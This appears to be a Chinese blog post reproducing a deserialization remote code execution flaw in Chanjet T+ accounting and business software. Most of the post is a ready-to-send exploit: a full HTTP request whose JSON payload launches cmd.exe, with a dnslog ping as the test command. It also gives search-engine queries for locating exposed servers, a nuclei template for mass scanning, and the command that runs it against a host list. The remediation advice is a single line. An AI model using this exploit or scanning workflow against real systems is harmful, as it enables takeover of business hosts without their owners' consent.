_副本-ynui.png)
畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
漏洞名称
畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
漏洞影响
畅捷通 T+ 13.0
畅捷通 T+ 16.0
漏洞描述
T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。该系统/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在反序列化RCE漏洞,会导致主机沦陷。
搜索语句
fofa-query: app="畅捷通-TPlus"hunter-query: app.name="畅捷通 T+"_副本-skhf.png)
漏洞复现
可以利用dnslog来复现,向靶场发送如下数据包,其中ping 6qevyvmi.dnslog.pw是dnslog payload
_副本-zefm.png)
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
}
}
}
}_副本-rtpj.png)
漏洞复现成功
批量漏洞扫描poc
nuclei poc文件内容如下
id: yonyou-chanjet-tplus-rratablecontroller-rce
info:
name: 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
author: fgz
severity: critical
description: |
T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。该系统/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在反序列化RCE漏洞,会导致主机沦陷。
reference:
None
metadata:
verified: true
max-request: 1
fofa-query: app="畅捷通-TPlus"
hunter-query: app.name="畅捷通 T+"
tags: chanjet,rce
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Connection: close
Content-Type: application/json
{
"storeID": {
"__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName": "Start",
"ObjectInstance": {
"__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName": "cmd",
"Arguments": "/c ping {{interactsh-url}}"
}
}
}
}
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"运行POC
nuclei.exe -t mypoc/用友/畅捷通T+/yonyou-chanjet-tplus-rratablecontroller-rce.yaml -l data/TPlus.txt-kpjf.png)
修复建议
查看官方补丁进行升级。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
